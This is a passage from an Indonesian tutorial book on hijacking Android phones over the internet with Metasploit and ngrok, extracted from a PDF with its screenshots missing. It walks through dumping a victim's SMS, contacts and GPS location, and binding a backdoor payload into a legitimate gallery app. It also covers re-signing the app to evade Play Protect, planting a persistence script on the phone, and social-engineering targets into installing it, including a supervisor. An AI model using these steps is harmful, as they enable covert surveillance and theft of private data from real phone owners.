DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
rm Menghapus file
Perintah Deskripsi
Perintah Deskripsi
BUKU TUTORIAL | 52
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Perintah Deskripsi
Perintah Deskripsi
record_mic Merekam audio dari microphone default user dalam kurun waktu
tertentu.
BUKU TUTORIAL | 53
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Perintah Deskripsi
Android Commands
Perintah Deskripsi
BUKU TUTORIAL | 54
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Perintah Deskripsi
Berikut ini adalah beberapa contoh penggunaan , disini kami hanya menyontohkan sebagian
perintah saja.
Sysinfo
Computer : localhost
BUKU TUTORIAL | 55
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Meterpreter : dalvik/android
Geolocate
Latitude: -7.0814984
Longitude: 111.9155463
Kita bisa melihat lokasi target dengan membuka googlemap dan memasukkan titik
koordinat target
dump_sms
BUKU TUTORIAL | 56
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
dump_contacts
Untuk hasil dumpnya kita bisa melihatnya pada folder “metasploit/app” , maka akan
ditampilkan daftar kontak berupa nama dan nomor hp.
Ketika kita memasukkan perintah app_list maka akan ditamplikan semua aplikasi beserta
nama packagenya. Seperti sebagai berikut :
BUKU TUTORIAL | 57
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Untuk menjalankannya kita tinggal ketikkan perintah app_run <nama Package>. Maka
aplikasi yang kita tuju akan terbuka pada handphone target. Contoh :
Setelah itu pada handphone target , aplikasi dengan package yang kita tuju akan otomatis
terbuka
Mungkin Cukup itu saja sebagian contoh penggunaan command ketika kita sudah
mendapatkan sesi meterpreter. Selebihnya kita bisa mencoba-coba perintah yang lain sendiri.
Selanjutnya kita akan mempelajari bagaimana cara menyisipkan payload kita ke aplikasi android
lain.
BUKU TUTORIAL | 58
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
8
INJECTING BACKDOOR PAYLOAD KEDALAM APLIKASI
ANDROID LAIN
Setelah kita membuat payload , payload kita memang bisa di install dan dibuka pada
handphone target , namun payload kita terlalu mencurigakan dikarenakan tidak ada launcher atau
tampilan apapun pada payload kita , maka dari itu kita perlu melakukan inject/Bind payload kita
ke aplikasi android lain , agar payload yang kita buat tidak terlihat mencurigakan.
Ada beberapa hal yang harus disiapkan sebelum kita melakukan injecting payload kedalam
aplikasi android lain , hal – hal yang perlu disiapkan antara lain .
1. Siapkan Apk target / apk yang nantinya akan kita sisipi payload backdoor kita .
BUKU TUTORIAL | 59
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
2. Install tool ApkTool , tool ini nantinya akan digunakan untuk proses compile dan
decompile Apk. Untuk link download dan cara installnya bisa dilihat pada website berikut.
https://ibotpeaches.github.io/Apktool/install/
3. Pastikan java yang terinstall pada komputer kita sudah versi yang paling terakhir
Setelah hal – hal yang diperlukan sudah disiapkan , selanjutnya kita bisa mulai tahap injectingnya.
1. Download aplikasi yang akan digunakan sebagai tempat menampung payload kita , saya
sarankan aplikasi yang ringan dan cukup sederhana saja. Disini saya memilih aplikasi
Galery karena cukup sederhana , untuk aplikasinya bisa didownload di
https://apkpure.com/id/gallery/photography.blackgallery.android.
2. Tentukan direktori tempat file apk target dan file output payload kita nanti. Disini saya
memilih untuk meletakkannya di desktop “home/widi/Desktop”
BUKU TUTORIAL | 60
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
4. Ubah nama file apk target menjadi lebih sederhana , agar bisa dibaca oleh terminal
nantinya.
5. Buka terminal sebagai root dan arahkan ke direktori tempat kita menginstall metasploit
6. Tambahkan path lokasi tempat kita menginstall apktool , contohnya pada folder “usr/bin”
, maka tambahkan dengan cara mengetik perintah “export PATH=$PATH:/usr/bin”
Contoh :
BUKU TUTORIAL | 61
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
BUKU TUTORIAL | 62
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
BUKU TUTORIAL | 63
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
11. Setelah proses injecting selesai kita bisa melihat hasilna pada direktori yang kita tentukan.
Disini saya menentukan output pada direktori “/home/widi/Desktop/Gallery_Injected.apk”
13. Ketikkan perintah seperti point sebelumnya , ketika kita ingin mendapatkan akses backdoor
melalui internet
14. Setelah itu kita tinggal melakukan social enginering untuk mengirim file hasil inject kita
ke Handphone target.
15. Pastikan target menginstall dan membuka file apk backdoor kita.
BUKU TUTORIAL | 64
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
16. Setelah itu kita akan mendapatkan akses session meterpreter dari handphone target.
BUKU TUTORIAL | 65
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Sekarang kita sudah berhasil menginjectkan backdoor payload kita pada aplikasi android
lain menggunakan metasploit . Namun semua itu metasploit yang melakukan dengan otomatis.
Lalu bagaimana sebenarnya cara kerja proses inject payload backdoor kita ke aplikasi lain
Setelah sebelumnya kita berhasil melakukan inject payload dengan metasploit , sekarang
kita akan belajar cara kerja atau proses sebenarnya dari proses injecting tersebut. Berikut
1. File apk target dan file payload dari metasploit didecompile , disini saya akan melakukan
decompiling dengan menggunakan apktool.
BUKU TUTORIAL | 66
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
3. Buka file AndroidManifest.xml pada direktori target , lalu kita cari file activity yang
dijadikan sebagai launcher pada aplikasi target.
Bisa kita lihat activity yang dijadikan launcher adalah SlidingDrawer , pada aplikasi lain
namanya akan berbeda beda
4. Kita cari dan buka file smali dari activity yang dijadikan sebagai launcher pada direktori
target/smali/ di aplikasi ini bernama SlidingDrawer.smali
6. Tambahkan perintah
BUKU TUTORIAL | 67
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
8. Buka Android Manivest dari direktori payload dan target , kemudian bandingkan <uses-
permission>nya , tambahkan uses permission yang belum ada dari AndroidManifest
payload ke AndroidManifest target.
10. Buat sertifikat yang nantinya akan digunakan untuk menandai apk yang telah dicompile
tadi
BUKU TUTORIAL | 68
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
11. Gunakan sertifikat tadi untuk menandai apk yang telah dicompile . Disini saya
menggunakan jarsigner untuk menandai apk. Kenapa apk harus diberi sign/tanda ?. Karena
jika tidak ada tandanya , android tidak akan mau menginstall apk tersebut . Karena apknya
dianggap tidak terpercaya. Untuk perintahnya pada jarsigner adalah sebagai berikut .
12. Selanjutnya kita gunakan zipalign itun memverifikasi sertifikat dan mengcompressnya
dengan perintah :
zipalign -v 4 <Apk target yang sudah dipasang sertifikat> <nama apk setelah nanti
diverifikasi>
BUKU TUTORIAL | 69
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Jadi begitulah sebenarnya yang terjadi pada proses injecting yang dilakukan metasploit
secara otomatis.
BUKU TUTORIAL | 70
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
9
MENGATASI APK TERDETEKSI TIDAK AMAN UNTUK
DIINSTAL
Setelah kita berhasil membuat payload dan bahkan menginjectkan payload backdoor kita
ke aplikasi android lain , terkadang aplikasi kita akan terdeteksi tidak aman. Terutama oleh google
Play Protect, lantas apa yang menyebabkan hal itu terjadi.
BUKU TUTORIAL | 71
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Biasanya itu terjadi kebanyakan karena proses “Signing” atau penandatanganan sertifikat
ketika kita membuat apk. Walaupun pada proses pembuatan apk metasploit sudah melakukan
signing . Namun kadang proses signingnya tidak sempurna, jadi kita perlu melakukan proses
signing secara manual
Walaupun ketika pembuatan dan injecting payload metasploit sudah melakukan proses
signing , namun adakalanya kita melakukan signing ulang secara manual. Lalu bagaimana caranya
? . Berikut adalah cara melakukan Signing secara manual :
Cara 1 :
2. Ketikka perintah “keytool -genkey -V -keystore <Output keystore format .jks / .keystore>
-alias <Nama alias untuk keystore> -keyalg RSA -keysize 2048 -validity 1000”
BUKU TUTORIAL | 72
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
4. Kita sudah membuat keystore yang akan digunakan untuk menandatangani atau melakukan
Signing pada aplikasi kita nanti. Disini saya memberi nama key.keystore dengan alias Widi
6. Selanjutnya kita kita lakukan tahap aligning. Dengan cara mengetikkan perintah : “zipalign
-v 4 Gallery_Injected.apk Galery_Injected_signed.apk”
Cara 2:
Jika setelah kita menggunakan cara 1 , namun apk masih terdeteksi tidak aman, kita bisa
menggunakan cara 2. yaitu dengan menggunakan aplikasi pada smartphone android yang bernama
mixexplorer. Berikut adalah caranya :
https://www.mediafire.com/file/42hzjanvnn3sklf/com.mixplorer_v6.44.1-
20043010_Android-2.0.apk/file
BUKU TUTORIAL | 73
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
2. Setelah kita download dan install buka dan cari aplikasi yang kita buat tadi.
3. Lalu kita klik tahan pada apk buatan kita , Klik simbol titik 3 pada pojok kanan atas , lalu
pilih menu “Sign”
4. maka aplikasi kita akan ditambahkan ke task list. Selanjutnya kita klik task list , lalu kita
klik task dari apk yang mau kita tanda tangani.
BUKU TUTORIAL | 74
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
BUKU TUTORIAL | 75
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Setelah kita berhasil melakukan Signing kita bisa melakukan social enginering dan mulai
membagikan aplikasi backdoor yang telah kita buat tadi. Namun sebelum itu kita akan
mempelajari tentang bagaimana cara pembuatan persistence backdoor
BUKU TUTORIAL | 76
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
10
MEMBUAT PERSISTANCE BACKDOOR
Jadi Persistence backdoor bisa diartikan sebagai pintu belakang yang selalu terbuka , yang
membuat kita bisa keluar masuk kedalam sistem. Sehingga walaupun target sudah menutup
aplikasi yang kita buat , ataupun merestart handphone android . kita masih bisa mendapatkan akses
lagi ketika target sudah menyalakan devicenya.
BUKU TUTORIAL | 77
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Setelah kita berhasil mendapatkan sesi meterpreter di handphone target . Ada langkah
penting yang harus dilakukan , yaitu menyisipkan persistence backdoor agar kita nantinya bisa
terhubung kembali dengan target. Bagaimana caranya ? , berikut adalah cara menyisipkan
persistence backdoor :
1. Dapatkan sesi meterpreter dengan target (disini kami anggap semuanya sudah bisa
mendapatkan akses dari payload backdoor yang dibuat/sudah mendapatkan sesi
meterpreter). Disini saya sarankan buat apk payload sederhana tanpa diinjectkan ke apk
lain , cukup payload apk dan jangan lupa memberinya Sign dengan mixplorer,
#!/bin/sh
while :
sleep 10
done
4. Pada msfconsole , ketikkan perintah “cd /sdcard” lalu ketikkan perintah “ls”.
BUKU TUTORIAL | 78
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
6. Selanjutnya kita akan melakukan upload file autorun.sh yang kita buat tadi dengan cara
mengetikkan perintah “upload <direktori tempat autorun sh>” contoh “upload
/home/widi/Desktop/autorun.sh”
7. Setelah upload , pastikan file sudah benar-benar ada pada direktori android korban dengan
mengetikkan perintah “ls” sekali lagi.
8. Selanjutnya kita ketikkan perintah “shell” pada msfconsole untuk beralih ke shell mode
BUKU TUTORIAL | 79
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
10. Kita bisa melihat bahwa intent selalu dieksekusi setiap 10 detik .
11. Sampai disini kita sudah berhasil membuat persistence backdoor. Jadi walaupun backdoor
kita sudah di force close atau target offline untuk beberapa saat kita masih bisa terhubung
kembali dengan target.
BUKU TUTORIAL | 80
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Cara ini akan gagal ketika target merestart handphone androidnya. Kecuali untuk
handphone android dengan akses root. Untuk handphone android dengan akses root , pada langkah
4 , kita ubah direktori “/sdcard” menjadi direktori “etc/init.d” dan kita jalankan perintah nohup.
Maka ketika android direstart android akan langsung mengeksekusi ulang perintah pada
autorun.sh.
BUKU TUTORIAL | 81
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
11
SOCIAL ENGINERING AGAR TARGET MENGINSTALL
PAYLOAD
Social engineering merupakan istilah yang digunakan untuk berbagai tindak kejahatan
yang dilakukan dengan memanfaatkan interaksi dengan manusia. Teknik ini menggunakan
manipulasi psikologis untuk menipu korban agar mereka melakukan kesalahan keamanan dan
memberikan informasi sensitif.
Social engineering sering digunakan oleh para hacker untuk mendapat informasi penting
karena mereka memahami bahwa manusia atau user menjadi rantai terlemah pada sistem
BUKU TUTORIAL | 82
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
keamanan jaringan. Meskipun Anda telah membangun sistem keamanan yang baik, namun jika
dioperasikan oleh user yang tidak kompeten, sistem tetap bisa dengan mudah diserang oleh hacker.
Berikut beberapa metode yang biasanya digunakan dalam social engineering untuk
pembajakan android dengan aplikasi backdoor payload :
PHISING
Phishing menjadi jenis serangan paling umum dalam social engineering. Hacker
akan menggunakan email yang berisi pesan palsu dan link berbahaya untuk memancing
korban agar memberikan informasi penting. Agar korban percaya, hacker akan menulis
pesan semirip mungkin dengan perusahaan resmi. Pesan juga akan ditulis dengan bahasa
yang mampu menimbulkan rasa urgensi sehingga korban akan membuka link berbahaya
dan memberikan data sensitif seperti user id, password, atau data penting lainnya. Jika
Anda menemukan email yang mencurigakan sebaiknya hindari untuk membuka
attachment atau link di dalamnya karena hacker juga bisa mengirim malware melalui email
tersebut.
Dalam hal ini , kita bisa melakukan rekayasa social dengan membuat sebuah web
palsu dengan tampilan menarik agar target melakukan download aplikasi yang kita buat
dan menginstallnya. Dengan menggunakan Ngrok kita bisa melakukan forwarding dari
website yang kita buat pada localhost agar berjalan dan bisa diakses melalui internet
melalui protocol Http yang disediakan oleh ngrok. Lalu kita tinggal menyebar jarring
dengan cara membagikan link ngrok , akan lebih baik jika linknya kita perpendek dengan
shortener yang disediakan oleh google.
WHALLING ATTACK
BUKU TUTORIAL | 83
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
Whalling attack merupakan jenis serangan phishing yang mengincar korban dengan
jabatan yang lebih tinggi atau memiliki peran penting di perusahaan. Teknik ini
mengadopsi teknik yang sama dengan email phishing, yang membedakan adalah target
yang diserang. Email dibuat menyerupai email bisnis penting yang dikirim oleh otoritas
resmi. Untuk melakukan metode ini, hacker membutuhkan lebih banyak penelitian dan
perencanaan daripada metode phishing biasa. Mereka harus mencari banyak informasi
terkait profil perusahaan atau target, agar email lebih mudah dipercaya oleh user yang akan
diserang.
Dalam hal ini mungkin jika kita bekerja sebagai orang yang membuat aplikasi
android kita bisa menyisipkan payload ke aplikasi yang kita buat yang nantinya akan diuji
oleh atasan tentunya. Dan ketika atasan mengeksekusi aplikasi yang kita buat. Kita akan
berhasil mendapatkan sesi meterpreter dadi atasan dan mengambil data yang kita inginkan.
PRETRXTING
Dalam metode pretexting, hacker akan membuat skenario palsu untuk mencuri data
pribadi korban. Serangan ini bisa dilakukan melalui telpon atau email dan social media.
Hacker akan berpura-pura menjadi petugas bank, petugas lembaga negara, rekan kerja, atau
bahkan staff IT perusahaan yang sedang membutuhkan info dari korban untuk tugas urgent.
Keberhasilan pretexting ini tergantung dari kemampuan hacker dalam membangun
kepercayaan dengan korban.
BUKU TUTORIAL | 84
Widianto Eka Saputro (170411100074)
PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
DAFTAR PUSTAKA
Chao, Stephen dan Mike Geodecke. 2015 . Embed a Metasploit Payload in an Original .Apk File.
https://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-
do-manually-0167124/ (diakses tanggal Juni 17 2020)
Chao, Stephen dan Mike Geodecke. 2015 . Create a Persistent Back Door in Android Using Kali
Linux: .https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-
kali-linux-0161280/ (diakses tanggal 17 Juni 2020)
Nkd, Feradhita. 2019. Metode-metode yang Digunakan dalam Serangan Social Engineering
.https://www.logique.co.id/blog/2019/09/03/serangan-social-engineering/ (diakses tanggal 17
Juni 2020).
BUKU TUTORIAL | 85
Widianto Eka Saputro (170411100074)